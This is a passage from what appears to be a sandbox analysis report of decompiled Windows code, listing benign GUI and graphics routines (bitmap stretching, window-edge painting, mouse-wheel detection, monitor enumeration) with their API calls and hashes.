                                  					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E0041FA18(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
                                  					_pop(_t178);
                                  					 *[fs:eax] = _t178;
                                  					_push(E0041F98B);
                                  					if(_v13 != 0) {
                                  						_push(0xffffffff);
                                  						_push(_v12);
                                  						_t115 =  *(_v8 + 4);
                                  						_push(_t115);
                                  						L004060F0();
                                  						return _t115;
                                  					}
                                  					return 0;
                                  				} else {
                                  					_v32 = 0;
                                  					_v28 = 0;
                                  					_push(_t188);
                                  					_push(0x41f919);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t190;
                                  					L00405FC8();
                                  					_v28 = E0041D144(0);
                                  					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
                                  					E0041D2E8( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E0041FA18(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
                                  					_t136 = 0;
                                  					_t180 = 0;
                                  					 *[fs:eax] = _t180;
                                  					_push(0x41f95e);
                                  					if(_v32 != 0) {
                                  						_t136 = SelectObject(_v28, _v32);
                                  					}
                                  					if(_v28 != 0) {
                                  						return DeleteDC(_v28);
                                  					}
                                  					return _t136;
                                  				}
                                  			}
                                  0x0041f90d
                                  0x00000000
                                  0x0041f913
                                  0x0041f918
                                  0x0041f918

                                  APIs
                                    • Part of subcall function 0041FCD8: 72E7AC50.USER32(00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD2E
                                    • Part of subcall function 0041FCD8: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD43
                                    • Part of subcall function 0041FCD8: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD4D
                                    • Part of subcall function 0041FCD8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD71
                                    • Part of subcall function 0041FCD8: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD7C
                                  • 72E7B410.GDI32(?,?,000000FF), ref: 0041F78A
                                  • 72E7B150.GDI32(?,?,?,000000FF), ref: 0041F799
                                  • 72E7AD70.GDI32(?,0000000C), ref: 0041F7AB
                                  • 72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 0041F7BA
                                  • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0041F7ED
                                  • SetStretchBltMode.GDI32(?,00000004), ref: 0041F7FB
                                  • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 0041F813
                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041F830
                                  • 72E7A590.GDI32(00000000,00000000,0041F919,?,?,0000000E,00000000,?,0000000C), ref: 0041F890
                                  • SelectObject.GDI32(?,?), ref: 0041F8A5
                                  • SelectObject.GDI32(?,00000000), ref: 0041F904
                                  • DeleteDC.GDI32(00000000), ref: 0041F913
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
                                  • String ID:
                                  • API String ID: 2051775979-0
                                  • Opcode ID: f9ca03cc71beaee575f2a9fedadbd701382e72aefc89468bb5f352252ddf40c4
                                  • Instruction ID: 3e5013a48adfd762d67b6aa276839b486c811f4c64bc2ac43f556e5ca65c849d
                                  • Opcode Fuzzy Hash: f9ca03cc71beaee575f2a9fedadbd701382e72aefc89468bb5f352252ddf40c4
                                  • Instruction Fuzzy Hash: CD714CB5A00205AFDB40EFADC985F9EB7F8AF08304F11856AB509EB291D738ED45CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E0041D154(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                  				void* _v8;
                                  				int _v12;
                                  				int _v16;
                                  				void* _v20;
                                  				int _v24;
                                  				struct HDC__* _v28;
                                  				struct HDC__* _v32;
                                  				int _v48;
                                  				int _v52;
                                  				void _v56;
                                  				int _t37;
                                  				void* _t41;
                                  				int _t43;
                                  				void* _t47;
                                  				void* _t72;
                                  				intOrPtr _t79;
                                  				intOrPtr _t80;
                                  				void* _t85;
                                  				void* _t87;
                                  				void* _t88;
                                  				intOrPtr _t89;
                                  
                                  				_t87 = _t88;
                                  				_t89 = _t88 + 0xffffffcc;
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_t71 = __ecx;
                                  				_v8 = __eax;
                                  				_push(0);
                                  				L00405FC8();
                                  				_v28 = __eax;
                                  				_push(0);
                                  				L00405FC8();
                                  				_v32 = __eax;
                                  				_push(_t87);
                                  				_push(0x41d2a2);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t89;
                                  				_t37 = GetObjectA(_v8, 0x18,  &_v56);
                                  				if(__ecx == 0) {
                                  					_push(0);
                                  					L004062C0();
                                  					_v24 = _t37;
                                  					if(_v24 == 0) {
                                  						E0041D09C(__ecx);
                                  					}
                                  					_push(_t87);
                                  					_push(0x41d211);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t89;
                                  					_push(_v12);
                                  					_push(_v16);
                                  					_t41 = _v24;
                                  					_push(_t41);
                                  					L00405FC0();
                                  					_v20 = _t41;
                                  					if(_v20 == 0) {
                                  						E0041D09C(_t71);
                                  					}
                                  					_pop(_t79);
                                  					 *[fs:eax] = _t79;
                                  					_push(0x41d218);
                                  					_t43 = _v24;
                                  					_push(_t43);
                                  					_push(0);
                                  					L004064F8();
                                  					return _t43;
                                  				} else {
                                  					_push(0);
                                  					_push(1);
                                  					_push(1);
                                  					_push(_v12);
                                  					_t47 = _v16;
                                  					_push(_t47);
                                  					L00405FB0();
                                  					_v20 = _t47;
                                  					if(_v20 != 0) {
                                  						_t72 = SelectObject(_v28, _v8);
                                  						_t85 = SelectObject(_v32, _v20);
                                  						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                                  						if(_t72 != 0) {
                                  							SelectObject(_v28, _t72);
                                  						}
                                  						if(_t85 != 0) {
                                  							SelectObject(_v32, _t85);
                                  						}
                                  					}
                                  					_pop(_t80);
                                  					 *[fs:eax] = _t80;
                                  					_push(E0041D2A9);
                                  					DeleteDC(_v28);
                                  					return DeleteDC(_v32);
                                  				}
                                  			}

























                                  APIs
                                  • 72E7A590.GDI32(00000000), ref: 0041D16B
                                  • 72E7A590.GDI32(00000000,00000000), ref: 0041D175
                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041D195
                                  • 72E7A410.GDI32(?,?,00000001,00000001,00000000,00000000,0041D2A2,?,00000000,00000000), ref: 0041D1AC
                                  • 72E7AC50.USER32(00000000,00000000,0041D2A2,?,00000000,00000000), ref: 0041D1B8
                                  • 72E7A520.GDI32(00000000,?,?,00000000,0041D211,?,00000000,00000000,0041D2A2,?,00000000,00000000), ref: 0041D1E5
                                  • 72E7B380.USER32(00000000,00000000,0041D218,00000000,0041D211,?,00000000,00000000,0041D2A2,?,00000000,00000000), ref: 0041D20B
                                  • SelectObject.GDI32(?,?), ref: 0041D226
                                  • SelectObject.GDI32(?,00000000), ref: 0041D235
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0041D261
                                  • SelectObject.GDI32(?,00000000), ref: 0041D26F
                                  • SelectObject.GDI32(?,00000000), ref: 0041D27D
                                  • DeleteDC.GDI32(?), ref: 0041D293
                                  • DeleteDC.GDI32(?), ref: 0041D29C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                  • String ID:
                                  • API String ID: 956127455-0
                                  • Opcode ID: 8d1fe9c1af0a1f6eeb46be8618a900aa40b0a023af058e787be64daa7972dcee
                                  • Instruction ID: f6596e839cd4c77808f4ea6068f308cd966c793918b8e7e01557e958c39b9838
                                  • Opcode Fuzzy Hash: 8d1fe9c1af0a1f6eeb46be8618a900aa40b0a023af058e787be64daa7972dcee
                                  • Instruction Fuzzy Hash: 5541FFB1E40215BFDB10EAE9CC42FAFB7BCEB09704F51446AF614F7281C67899408B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 55%
                                  			E00433260(intOrPtr* __eax, intOrPtr __edx) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				struct HDC__* _v16;
                                  				struct tagRECT _v32;
                                  				struct tagRECT _v48;
                                  				void* _v64;
                                  				struct HDC__* _t120;
                                  				void* _t171;
                                  				intOrPtr* _t193;
                                  				intOrPtr* _t196;
                                  				intOrPtr _t205;
                                  				void* _t208;
                                  				intOrPtr _t216;
                                  				signed int _t234;
                                  				void* _t237;
                                  				void* _t239;
                                  				intOrPtr _t240;
                                  
                                  				_t237 = _t239;
                                  				_t240 = _t239 + 0xffffffc4;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
                                  					_t120 = E004325A4(_v8);
                                  					_push(_t120);
                                  					L004063B8();
                                  					_v16 = _t120;
                                  					_push(_t237);
                                  					_push(0x4334c6);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t240;
                                  					GetClientRect(E004325A4(_v8),  &_v32);
                                  					GetWindowRect(E004325A4(_v8),  &_v48);
                                  					MapWindowPoints(0, E004325A4(_v8),  &_v48, 2);
                                  					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
                                  					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					if( *(_v8 + 0x165) != 0) {
                                  						_t208 = 0;
                                  						if( *(_v8 + 0x163) != 0) {
                                  							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
                                  						}
                                  						if( *(_v8 + 0x164) != 0) {
                                  							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
                                  						}
                                  						_t234 = GetWindowLongA(E004325A4(_v8), 0xfffffff0);
                                  						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
                                  							_v48.left = _v48.left - _t208;
                                  						}
                                  						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
                                  							_v48.top = _v48.top - _t208;
                                  						}
                                  						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
                                  							_v48.right = _v48.right + _t208;
                                  						}
                                  						if((_t234 & 0x00200000) != 0) {
                                  							_t196 =  *0x44de70; // 0x44f8f8
                                  							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
                                  						}
                                  						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
                                  							_v48.bottom = _v48.bottom + _t208;
                                  						}
                                  						if((_t234 & 0x00100000) != 0) {
                                  							_t193 =  *0x44de70; // 0x44f8f8
                                  							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
                                  						}
                                  						DrawEdge(_v16,  &_v48,  *(0x44daa0 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x44dab0 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x44dac0 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x44dad0 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
                                  					}
                                  					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
                                  					FillRect(_v16,  &_v48, E0041C700( *((intOrPtr*)(_v8 + 0x170))));
                                  					_pop(_t216);
                                  					 *[fs:eax] = _t216;
                                  					_push(0x4334cd);
                                  					_push(_v16);
                                  					_t171 = E004325A4(_v8);
                                  					_push(_t171);
                                  					L004064F8();
                                  					return _t171;
                                  				} else {
                                  					 *((intOrPtr*)( *_v8 - 0x10))();
                                  					_t205 = E00425930(E00425850());
                                  					if(_t205 != 0) {
                                  						_t205 = _v8;
                                  						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
                                  							_t205 = E00425E60(E00425850(), 0, _v8);
                                  						}
                                  					}
                                  					return _t205;
                                  				}
                                  			}





















                                  APIs
                                  • 72E7B080.USER32(00000000), ref: 00433294
                                  • GetClientRect.USER32 ref: 004332B7
                                  • GetWindowRect.USER32 ref: 004332C9
                                  • MapWindowPoints.USER32 ref: 004332DF
                                  • OffsetRect.USER32(?,?,?), ref: 004332F4
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0043330D
                                  • InflateRect.USER32(?,00000000,00000000), ref: 0043332B
                                  • GetWindowLongA.USER32 ref: 00433381
                                  • DrawEdge.USER32(?,?,00000000,00000008), ref: 0043344D
                                  • IntersectClipRect.GDI32(?,?,?,?,?), ref: 00433466
                                  • OffsetRect.USER32(?,?,?), ref: 00433485
                                  • FillRect.USER32 ref: 004334A1
                                  • 72E7B380.USER32(00000000,?,004334CD,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 004334C0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                  • String ID:
                                  • API String ID: 156109915-0
                                  • Opcode ID: a85cbce6cdd4115c18a511a9fe33bb7146ec71409315ab613f7e6cf49ab6f6c9
                                  • Instruction ID: adecaa6546b22b808243860026d4c071239a2995f3d98b031f9bced86518c823
                                  • Opcode Fuzzy Hash: a85cbce6cdd4115c18a511a9fe33bb7146ec71409315ab613f7e6cf49ab6f6c9
                                  • Instruction Fuzzy Hash: B991E571E00608AFDB01DFA9C985EEEB7F9AF09314F1541AAF914F7251C779AE008B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406780(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                                  				intOrPtr* _v8;
                                  				struct HWND__* _t19;
                                  				int* _t20;
                                  				int* _t26;
                                  				int* _t27;
                                  
                                  				_t26 = _t20;
                                  				_t27 = __edx;
                                  				_v8 = __eax;
                                  				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                                  				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                                  				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
                                  				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
                                  				if( *_t27 == 0 || _t19 == 0) {
                                  					 *_a8 = 0;
                                  				} else {
                                  					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
                                  				}
                                  				if( *_t26 == 0 || _t19 == 0) {
                                  					 *_a4 = 3;
                                  				} else {
                                  					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
                                  				}
                                  				return _t19;
                                  			}








                                  APIs
                                  • FindWindowA.USER32 ref: 00406798
                                  • RegisterClipboardFormatA.USER32 ref: 004067A4
                                  • RegisterClipboardFormatA.USER32 ref: 004067B3
                                  • RegisterClipboardFormatA.USER32 ref: 004067BF
                                  • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004067D7
                                  • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 004067FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                  • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                  • API String ID: 1416857345-3736581797
                                  • Opcode ID: ebc77da63279e8c923901a8f4573aa9d47a561bb278150ac055fe8b94d012605
                                  • Instruction ID: 373dc2d44cffb1d4e10de33ccc24215450a4b6518063546f2f673c0df03fd65f
                                  • Opcode Fuzzy Hash: ebc77da63279e8c923901a8f4573aa9d47a561bb278150ac055fe8b94d012605
                                  • Instruction Fuzzy Hash: 70113371241305AFE710AF65DC41B6AB7A8EF45714F22843BF842BB2C1D6B89C60CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 57%
                                  			E00425E60(void* __eax, void* __ecx, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				struct HDC__* _v12;
                                  				struct tagRECT _v28;
                                  				struct tagRECT _v44;
                                  				char _v56;
                                  				char _v72;
                                  				signed char _t43;
                                  				struct HDC__* _t55;
                                  				void* _t74;
                                  				signed int _t77;
                                  				int _t78;
                                  				int _t79;
                                  				void* _t92;
                                  				intOrPtr _t105;
                                  				void* _t114;
                                  				void* _t117;
                                  				void* _t120;
                                  				void* _t122;
                                  				intOrPtr _t123;
                                  
                                  				_t120 = _t122;
                                  				_t123 = _t122 + 0xffffffbc;
                                  				_t92 = __ecx;
                                  				_v8 = __edx;
                                  				_t114 = __eax;
                                  				_t43 = GetWindowLongA(E004325A4(_v8), 0xffffffec);
                                  				if((_t43 & 0x00000002) == 0) {
                                  					return _t43;
                                  				} else {
                                  					GetWindowRect(E004325A4(_v8),  &_v44);
                                  					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
                                  					_t55 = E004325A4(_v8);
                                  					_push(_t55);
                                  					L004063B8();
                                  					_v12 = _t55;
                                  					_push(_t120);
                                  					_push(0x425fbb);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t123;
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_t117 = _t114;
                                  					if(_t92 != 0) {
                                  						_t77 = GetWindowLongA(E004325A4(_v8), 0xfffffff0);
                                  						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
                                  							_t78 = GetSystemMetrics(2);
                                  							_t79 = GetSystemMetrics(3);
                                  							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
                                  							E004120F0(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							_t117 = _t117;
                                  							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
                                  						}
                                  					}
                                  					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
                                  					E00425A98( &_v56, 2);
                                  					E004259EC(_t117,  &_v56, _v12, 0,  &_v44);
                                  					_pop(_t105);
                                  					 *[fs:eax] = _t105;
                                  					_push(0x425fc2);
                                  					_push(_v12);
                                  					_t74 = E004325A4(_v8);
                                  					_push(_t74);
                                  					L004064F8();
                                  					return _t74;
                                  				}
                                  			}






















                                  APIs
                                  • GetWindowLongA.USER32 ref: 00425E7B
                                  • GetWindowRect.USER32 ref: 00425E96
                                  • OffsetRect.USER32(?,?,?), ref: 00425EAB
                                  • 72E7B080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00425EB9
                                  • GetWindowLongA.USER32 ref: 00425EEA
                                  • GetSystemMetrics.USER32 ref: 00425EFF
                                  • GetSystemMetrics.USER32 ref: 00425F08
                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00425F17
                                  • GetSysColorBrush.USER32(0000000F), ref: 00425F44
                                  • FillRect.USER32 ref: 00425F52
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00425FBB,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00425F77
                                  • 72E7B380.USER32(00000000,?,00425FC2,?,?,00000000,00425FBB,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00425FB5
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
                                  • String ID:
                                  • API String ID: 3936689491-0
                                  • Opcode ID: 9324ecb7928763b8aa494e38613d7ce824e082933cf04a826453b82e8629d0d3
                                  • Instruction ID: de85d42abca62c709ce2260da3e2f52b379b9394287fd5632d29bbfe05bb0d53
                                  • Opcode Fuzzy Hash: 9324ecb7928763b8aa494e38613d7ce824e082933cf04a826453b82e8629d0d3
                                  • Instruction Fuzzy Hash: 22414071A00518AFCB01EAE9CD42EDFB7BDEF49324F510126F905F7281C678AE0587A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E004220E4(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                                  				struct tagPOINT _v12;
                                  				int _v16;
                                  				struct tagRECT _v32;
                                  				struct tagRECT _v48;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t60;
                                  				int _t61;
                                  				RECT* _t64;
                                  				struct HDC__* _t65;
                                  
                                  				_t64 = _a8;
                                  				_t65 = _a4;
                                  				if( *0x44f927 != 0) {
                                  					_t61 = 0;
                                  					if(_a12 == 0) {
                                  						L14:
                                  						return _t61;
                                  					}
                                  					_v32.left = 0;
                                  					_v32.top = 0;
                                  					_v32.right = GetSystemMetrics(0);
                                  					_v32.bottom = GetSystemMetrics(1);
                                  					if(_t65 == 0) {
                                  						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                  							L13:
                                  							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                                  						} else {
                                  							_t61 = 1;
                                  						}
                                  						goto L14;
                                  					}
                                  					_v16 = GetClipBox(_t65,  &_v48);
                                  					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                                  						goto L14;
                                  					}
                                  					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                                  					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                                  						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                  							goto L13;
                                  						}
                                  						if(_v16 == 1) {
                                  							_t61 = 1;
                                  						}
                                  						goto L14;
                                  					} else {
                                  						goto L13;
                                  					}
                                  				}
                                  				 *0x44f914 = E00421B38(7, _t60,  *0x44f914, _t64, _t65);
                                  				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                                  				goto L14;
                                  			}















                                  APIs
                                  • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042211D
                                  • GetSystemMetrics.USER32 ref: 00422142
                                  • GetSystemMetrics.USER32 ref: 0042214D
                                  • GetClipBox.GDI32(?,?), ref: 0042215F
                                  • GetDCOrgEx.GDI32(?,?), ref: 0042216C
                                  • OffsetRect.USER32(?,?,?), ref: 00422185
                                  • IntersectRect.USER32 ref: 00422196
                                  • IntersectRect.USER32 ref: 004221AC
                                    • Part of subcall function 00421B38: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00421BB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                  • String ID: EnumDisplayMonitors
                                  • API String ID: 362875416-2491903729
                                  • Opcode ID: c447c8a639b653406857bb11d3e501cf41a9d1f553696839e4d44940276954b9
                                  • Instruction ID: dd36abe407eb744ef8976a326b6c88aae4d1b7ace6775b9ec6243657e7a966d0
                                  • Opcode Fuzzy Hash: c447c8a639b653406857bb11d3e501cf41a9d1f553696839e4d44940276954b9
                                  • Instruction Fuzzy Hash: A5311E75A00219BEDB11DFA5DD44EFF77BCAB09310F404137EA11E2241EB789A15CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E00430734(intOrPtr* __eax, void* __edx) {
                                  				struct HDC__* _v8;
                                  				void* _v12;
                                  				void* _v16;
                                  				struct tagPAINTSTRUCT _v80;
                                  				intOrPtr _v84;
                                  				void* _v96;
                                  				struct HDC__* _v104;
                                  				void* _v112;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t38;
                                  				struct HDC__* _t47;
                                  				struct HDC__* _t55;
                                  				intOrPtr* _t83;
                                  				intOrPtr _t102;
                                  				void* _t103;
                                  				void* _t108;
                                  				void* _t111;
                                  				void* _t113;
                                  				intOrPtr _t114;
                                  
                                  				_t111 = _t113;
                                  				_t114 = _t113 + 0xffffff94;
                                  				_push(_t103);
                                  				_t108 = __edx;
                                  				_t83 = __eax;
                                  				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
                                  					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E0042F340(_t83) != 0) {
                                  						_t38 = E00430258(_t83, _t83, _t108, _t103, _t108);
                                  					} else {
                                  						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
                                  					}
                                  					return _t38;
                                  				} else {
                                  					L004062C0();
                                  					 *((intOrPtr*)( *__eax + 0x44))();
                                  					 *((intOrPtr*)( *__eax + 0x44))();
                                  					_t47 = _v104;
                                  					L00405FC0();
                                  					_v12 = _t47;
                                  					L004064F8();
                                  					L00405FC8();
                                  					_v8 = _t47;
                                  					_v16 = SelectObject(_v8, _v12);
                                  					 *[fs:eax] = _t114;
                                  					_t55 = BeginPaint(E004325A4(_t83),  &_v80);
                                  					E0042D05C(_t83, _v8, 0x14, _v8);
                                  					 *((intOrPtr*)(_t108 + 4)) = _v8;
                                  					E00430734(_t83, _t108);
                                  					 *((intOrPtr*)(_t108 + 4)) = 0;
